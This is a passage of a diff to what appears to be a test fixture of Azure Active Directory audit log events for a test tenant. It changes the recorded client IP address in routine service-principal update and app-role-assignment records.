e\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"811fd012-35a6-4a0c-abce-79fb08b9ab6c\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 
Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:37.2595378Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34620448\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ad2523c5-ea21-4329-8c31-ccbd1af8c337_00000000-0000-0000-0000-000000000000_ad2523c5-ea21-4329-8c31-ccbd1af8c337\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"99a3d3e3-e4f6-4de7-96e0-6333564e1b25\",\"ModifiedProperties\":[{\"Name\":\"Included Updated Properties\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Update service 
principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:37\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{
\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"811fd012-35a6-4a0c-abce-79fb08b9ab6c\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:37.2595378Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34620448\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ad2523c5-ea21-4329-8c31-ccbd1af8c337_00000000-0000-0000-0000-000000000000_ad2523c5-ea21-4329-8c31-ccbd1af8c337\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"99a3d3e3-e4f6-4de7-96e0-6333564e1b25\",\"ModifiedProperties\":[{\"Name\":\"Included Updated 
Properties\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Update service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}"
 },
 "o365audit": {
 "Actor": [
@@ -21152,9 +21152,9 @@
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "AzureActiveDirectoryEventType": 1,
- "ClientIP": "83.57.233.151",
+ "ClientIP": "67.43.156.15",
 "CreationTime": "2020-02-11T16:45:37",
 "ExtendedProperties": [
 {
@@ -21369,7 +21369,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:45:41\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":\\\"siem2\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\",\\\"Name\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:41.8071361Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622707\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",
\"Value\":\"R5\"}],\"Id\":\"256e3859-87ca-4b23-b2c0-45a26ccd7925\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem2\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:41\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":\\\"siem2\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\",\\\"Name\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:41.8071361Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622707\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",
\"Value\":\"R5\"}],\"Id\":\"256e3859-87ca-4b23-b2c0-45a26ccd7925\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem2\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ 
@@ -21399,9 +21399,9 @@
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "AzureActiveDirectoryEventType": 1,
- "ClientIP": "83.57.233.151",
+ "ClientIP": "67.43.156.15",
 "CreationTime": "2020-02-11T16:45:41",
 "ExtendedProperties": [
 {
@@ -21635,7 +21635,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:45:41\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":\\\"siem2\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\",\\\"Name\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:41.8821342Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622751\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",
